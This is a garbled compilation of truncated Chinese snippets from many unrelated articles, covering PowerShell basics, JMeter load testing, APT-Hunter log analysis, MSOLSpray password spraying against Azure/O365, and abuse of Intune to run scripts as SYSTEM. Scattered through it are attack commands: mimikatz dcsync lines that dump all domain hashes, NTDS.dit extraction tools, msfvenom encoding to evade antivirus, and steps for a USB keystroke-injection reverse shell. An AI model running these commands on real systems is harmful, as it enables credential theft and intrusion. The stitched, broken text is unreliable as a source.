MSOLSpray是一款针对微软在线账号(Azure/O365)的密码喷射与安全测试工具,在该工具的帮助下,广大研究人员可以直接对目标账户执行安全检测。...支持检测的内容包括目标账号凭证是否有效、账号是否启用了MFA、租户账号是否存在、用户账号是否存在、账号是否被锁定或账号是否被禁用等情况。...,每行一个用户名,格式为“user@domain.com" (必须) -p PASSWORD, --password PASSWORD 用于执行密码喷洒的单个密码.../fireprox --out valid-users.txt PowerShell版本 首先我们需要提前准备好一个包含目标电子邮箱地址(每一个地址单独一行)的userlist用户列表文件,然后使用“...\userlist.txt -Password Winter2020 Invoke-MSOLSpray参数选项 UserList - UserList目标用户列表文件,每行一个用户名,格式为“user
收集日志:用户可以手动收集CSV和EVTX格式的日志,也可以使用本文后面讨论的powershell脚本自动提取所需的日志。...分析CSV日志:APT-hunter使用内置库(csv)来解析CSV日志文件,然后使用Regex为APT-Hunter中使用的每个事件提取字段。用户可以使用提取的字段来创建他们的用例。...支持将Windows事件日志导出为EVTX和CSV。 分析师可以将新的恶意可执行文件名称直接添加到list中。 提供输出为excel表,每个Log作为工作表。 此版本只是开始,更多用例即将出现。...2.终端服务的统计信息,以使用户可以交互访问或使用RDP访问服务器GUI终端。 ? 3.成功/失败身份验证的统计信息,以便获得身份验证摘要,以帮助您检测异常或不应该登录设备的用户。 ?...使用安全日志检测用户添加到通用组的用户 使用安全日志检测从全局组中删除的用户 使用安全日志检测从通用组中删除的用户 使用安全日志检测从本地组中删除的用户 使用安全日志检测从全局组中删除的用户 检测使用安全日志删除的用户帐户
获取多个真实用户的token的两种方法: 1)第一种:让开发帮忙生成多个token(多个用户账户生成的token),导出为csv格式的文件(以下步骤均以该方法为基础) ?...2)第二种:自己设置多个用户账户和密码,并存储于txt文件中,文件名称叫:login.txt(使用详情见步骤三) ? 2. 新建线程组,并根据需求设置”线程数“和”时间“ ? 3....在线程组下添加CSV数据文件设置 1)从本地添加带有token信息的csv文件、设置文件编码为”UTF-8“ 2)变量名称设置为”token“,方便信息头调用 ? 5....三、模拟多个用户获取token并应用在其他接口 1. 创建login.txt文件,并在CSV Data Set Config中选择该文件所在路径 ? 2....从图中可以看出,集合到3个用户才发送请求,做到了绝对并发。 ? 2. 多场景混合并发测试: 1)在线程组下面(各个接口上面),添加多个吞吐量控制器(Throughput Controller) ?
0x01 PowerShell简介及特性 Windows Powershell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用.NET Framework的强大功能(因此也支持.NET对象...函数: a).函数是自定义的powershell代码,有三个原则: ●简短:函数名简短,并且显而易见 ●聚合:函数可以完成多个操作 ●封装和扩展:将一批powershell语句进行封装,实现全新的功能需求函数结构...脚本: a).创建脚本(以.ps1为后缀) ●通过重定向创建脚本: ? ●通过编辑器创建脚本: 通过txt来编写 ? ●通过powershell自带的ISE或者其他编写工具: ?...●Restricted: 为Powershell默认的策略,不允许任何脚本执行。 ●AllSigned:所有脚本都必须经过签名才能在运行。...查看Windows目录下所有文本文件txt的大小。 ? 可将数据输出为HTML格式、CSV格式等。 ? 打开文件: ?
收集日志:用户可以手动收集CSV和EVTX格式的日志,或者使用本文后面讨论的powershell脚本来自动提取所需的日志。...分析CSV日志:APT-hunter使用内置库(csv)来解析CSV日志文件,然后使用Regex为APT-hunter中使用的每个事件提取字段。...python3 -m pip install -r Requirements.txt APT-Hunter易于使用,您只需使用参数-h即可打印帮助以查看所需的选项 -p: 提供包含使用powershell...-t: 日志类型(如果是CSV或EVTX) 剩余的参数,如果您想分析单一类型的日志。...使用安全日志检测用户添加的用户到通用组 使用安全日志检测从全局组中删除的用户 使用安全日志检测从通用组中删除的用户 使用安全日志检测从本地组中删除的用户 使用安全日志检测从全局组中删除的用户 检测使用安全日志删除的用户帐户
powershell支持重定向,>为覆盖,>>追加,注意可直接将字符串重定向到文件,如下: 12 "Powershell Routing" > test.txt"Powershell Routing..." >> test.txt 变量 变量可以临时保存数据,因此可以把数据保存在变量中,以便进一步操作,powershell 不需要显示地去声明,可以自动创建变量,只须记住变量的前缀为$。...Format-List: 将输出的格式设置为属性列表,其中每个属性均各占一行显示。 Format-Table: 将输出的格式设置为表。...Format-Wide: 将对象的格式设置为只能显示每个对象的一个属性的宽表。 Get-Unique: 从排序列表返回唯一项目。 Group-Object: 指定的属性包含相同值的组对象。...Select-Object: 选择一个对象或一组对象的指定属性。它还可以从对象的数组中选择唯一对象,也可以从对象数组的开头或末尾选择指定个数的对象。 Sort-Object: 按属性值对象进行排序。
lsadump::dcsync /domain:pentest.com /all /csv 图6-34使用Dcsync获取域内所有用户和Hash Tips: 1、mimikatz的dcsync功能也可以导出指定某个用户的...如果用户太多mimikatz不能完全显示,可以先执行log命令,log命令会在mimikatz目录生成一个txt,记录所有mimikatz的执行结果,方便阅览。...,本书中为方便演示直接生成的exe文件,在实战环境下可以使用msfvenom生成时进行编码,绕过防病毒软件,或使用其他格式的Payload,方便修改绕过防病毒软件,如生成Powershell,Vbs等格式...图6-44实验所需工具 在shadowcopy.bat中设置工作目录为C:\Windows\Temp\具体目录可以在shadowcopy.bat中自行设置,直接执行shadowcopy.bat脚本,该脚本先使用...在线NTLM的hash值破解。
我一直对允许以下攻击的攻击保持警惕: 从本地(on-prem)设备/用户上下文横向移动到 Azure Azure Active Directory (AAD) 租户内的权限提升 从 Azure AD 横向移动到本地...如果组织正在使用混合 Azure AD 加入来管理本地 Windows 系统,则控制“全局管理员”或“Intune 管理员”主体的攻击者可以作为 SYSTEM 用户在这些本地设备上执行任意 PowerShell...滥用三个端点管理系统之一在混合连接的设备上执行 PowerShell 脚本需要“全局管理员”或“Intune 管理员”角色。...您可以选择将脚本分配给“所有设备”、“所有用户”或“所有用户和设备”。...结论 滥用 Microsoft Endpoint Manager 为攻击者提供了一种以 SYSTEM 用户身份在混合加入 Azure 租户的设备上执行代码的方法。
不同操作系统内置的Powershell是不一样的,比如win7或win2008,如何查看版本呢? $psversiontable 输出结果如下图所示: ---- 2.为什么强大?...首先,它可以进行计算任务,包括计算1gb大小(以字节为单位),还有基本的运算。 其次,Powershell可以获取计算机的服务详细信息、状态等。...ls | format-table name, mode > demo.txt type demo.txt 上面代码是将ls显示文件内容的name和mode信息存储至本地demo.txt文件夹中,再调用...---- 2.自定义别名 设置别名,将notepad设置为新的别名pad。pad打开notepad,表明我们的别名创建成功。...,用户变量只对当前用户生效。
NTDS.dit文件的方式 Hash 值存储在域控制器中(C:\Windows\NTDS\NTDS.DIT) Mimikatz Mimikatz有一个功能(dcsync),它利用目录复制服务(DRS)从...Mimikatz "lsadump::dcsync /domain:test.com /all /csv" exit > hash.txt //所有用户 Mimikatz "lsadump::dcsync.../domain:test.com /user:username" exit > hash.txt //# 指定用户 Ntdsutil Ntdsutil 域控制器默认安装,使管理员能访问和管理...项目地址:https://github.com/EmpireProject/Empire # 远程加载 Invoke-DCSync.ps1 # 远程加载 Invoke-DCSync.ps1 powershell...# 在线模式:无需导出注册表 NTDSDumpEx.exe -d ntds.dit -r -o hash.txt Impacket 项目地址:https
\test.txt # Powershell Routing # Powershell Routing 筛选和过滤 Select-Object 描述:显示特定的列字段的数据; 基础实例: get-process...Format-List: 将输出的格式设置为属性列表,其中每个属性均各占一行显示。 Format-Table: 将输出的格式设置为表。...Format-Wide: 将对象的格式设置为只能显示每个对象的一个属性的宽表。 基础语法: #对于任何一个对象都可以使用Format-List * , 查看它所有的属性和方法。...脚本块作为属性 PS > ls | Format-Table Name,@{ Expression={[int]($_.Length/1kb)};Label="Kb"} -Wrap #可以使用Lable设置显示列头为...描述: Get-Service | Export-Csv a.csv ; . a.csv
pip3 install faker 你可以提供一个字典文件,或预生成的密码。生成选项可以用来测试Hashcat规则等等,字典选项在提供特定的密码列表时也非常有用,我们可以用它来实现字典攻击。...输出数据为一个CSV文件和一个PowerShell脚本,它们会被拷贝到目标设备中。在执行过程中,PowerShell脚本会绑定LDAP,所以它不依赖于新的活动目录模块。...RoadMap 1、 生成多个部门(OU); 2、 生成组架构并随机分配; 3、 实现额外的Faker对象属性来填充LDAP域,例如地址和区域等等; 4、 从创建嵌套分组结构的组织结构图; 工具使用样例...Creating Powershell script for import : sales_example.ps1 CSV文件样本输出: Name,GivenName,sn,ou,password,address...Creating Powershell script for import : IT_example.ps1 上述字典选项的CSV输出文件内容: Name,GivenName,sn,ou,password
whitecellclub 显示文件内容:Get-Content test.txt 设置文件内容:Set-Content test.txt-Value “hello,world!”...ScriptModification:在目标主机上创建或修改脚本 其GitHub地址为: https://github.com/PowerShellMafia/PowerSploit 1.PowerSploit...Get-Process 第三步,输入命令创建一个新进程,并把它设置为隐藏的。...与其他用户创建进程登录令牌,并模仿当前线程中的登录令牌 Get-MicrophoneAudio.ps1 通过麦克风记录声音 VolumeShadowCopyTools.ps1 Recon(信息侦察):这个文件夹主要是以目标主机为跳板进行内网主机侦察...,以将受管理的DLL加载到内存中 Remove-Comments.ps1 从脚本中删除注释和多余的空白 Persistence(权限维持) New-UserPersistenceOption 为添加持久性函数配置用户级持久性选项
使用组策略首选项配置组策略批量修改用户本地管理员密码 开始 - >管理工具 - >组策略管理 - >在这个域中创建GPO 设置 - 右键 - 编辑 - 用户配置 - 首选项 - 控制面板设置 - 本地用户和组...这次将输出到CSV文件中。...此命令也可以通过WMI或PowerShell的远程执行。 ? ?...Invoke-NinaCopy是一个PowerShell函数,它可以利用PowerShell远程处理(必须在目标DC上启用PowerShell远程处理),从远程计算机上复制文件(即使文件已锁定,可直接访问文件...同时,确保注册表DsrmAdminLogonBehavior的值不为2,最好将其直接删除或者设置其值为1或0。 安全支持提供商 https://adsecurity.org/?
ls | format-table name, mode > demo.txt type demo.txt 上面代码是将ls显示文件内容的name和mode信息存储至本地demo.txt文件夹中,再调用...---- 2.自定义别名 设置别名,将notepad设置为新的别名pad。pad打开notepad,表明我们的别名创建成功。...,用户变量只对当前用户生效。...通过管理员身份打开CMD,再设置其权限即可,设置完成之后可以调用相关的脚本程序。...希望你能成长为一名厉害的系统安全工程师或病毒分析师,到时候记得回到这篇文章的起点,告诉你的好友。 学安全一年,认识了很多安全大佬和朋友,希望大家一起进步。这篇文章中如果存在一些不足,还请海涵。
单引号告诉Windows PowerShell不要将任何字符解释为转义序列。 -Stream #参数用于从文件中获取特定的备用NTFS文件流,支持通配符。 使用星号*来获取所有流。...\file3.txt # This is file3.txt in the subfolder Tips : Copy-Item cmdlet的容器参数设置为$false, 此时会导致复制源文件夹的内容但不会保留文件夹结构...命令 # 2.批量重命令将后缀为.txt得文件重名为.log结尾得文件(可以采用正则匹配元组来设置重命名得名称-思路值得学习) Get-ChildItem *.txt | Rename-Item -...默认情况下 Get Content只从默认值中检索数据或者:$data stream。流可用于存储隐藏的数据,如属性、安全设置或其他数据。它们也可以存储在目录中,而不是子项。...\NewFile.txt # 5.即使IsReadOnly文件属性设置为True,此命令也会向文件添加一个值。 Add-Content -Path .
将默认的URL“http://example.com”改成你自己的域名或IP地址。...把你修改过的代码粘贴到在线DuckToolkit编码器中,选择键盘样式,然后点击生成脚本。 6. 下载“inject.bin” 和 “inject.txt” 文件。...这时两个文件都生成完毕, “powershell_attack.txt” 和“unicorn.rc”。将powershell_attack.txt 命名为第四步中你打算放在服务器上的文件名。...设置exploit,然后设置其他payload返回你一个有权限的shell。这次我们使用标准的反向tcp因为创建其他reverse_https通道好像有问题。 23....把SESSION设置为无UAC限制的有权限的session,我的是SESSION2 29.
,可以将非结构化数据从任何位置迁移到Azure或Modern windows Server,使用SMB协议,支持从2003到2019所有的服务器迁移到Win 2012 R2至2019中,详细内容参考:https...最重要的是,该功能无需安装配置或启动,其默认在后台是启用的。可以在Windows Admin Center或PowerShell中进行查看。...较慢的磁盘驱动器会在PowerShell和Windows Admin Center中自动标识为“异常延迟“状态。...是的某些交换机或路由器中的USB磁盘可以作为仲裁卷。 集群基础架构 CSV Cache当前默认为启动状态用于加速提升虚拟机的性能。...Ÿ动态虚拟机多队列(d.VMMQ) 低延迟后台传输 Low Extra Delay Background Transport (LEDBAT) 是一种延迟优化、网络拥塞控制的技术,旨在自动为用户和应用程序提供带宽
分析数据->获得结论->成果可视化 1.3 为什么要学习数据分析 1.有岗位需要 2.是机器学习的基础 3.数据科学的基础 1.4 环境部署 1.4.1 认识jupyter 1.基于web的在线编辑器...Json源自JavaScript语言,易于人类的阅读和编写,同时也易于机器解析和生成,是目前应用最广泛的数据交换格式。...json1.txt",'r')) print(s) 2.5 CSV文件操作 以纯文本形式存储的表格数据(以逗号作为分隔符),通常第一行为列名 2.5.1 CSV文件写操作 import csv with...open("demo.csv", "w", newline="") as datacsv: # 不设置newline=“”的时候,写入会增加一个空白行 #默认打开的方式是excel表格 csvwriter...2.6 Excel文件操作 Excel和CSV区别: 1.都可以Excel程序打开 2.Excel除了文本,数据也可以包含图表、样式等 3.CSV每条记录都存储为一行文本文件,每一条新行都表示一个新的数据记录
领取专属 10元无门槛券
手把手带您无忧上云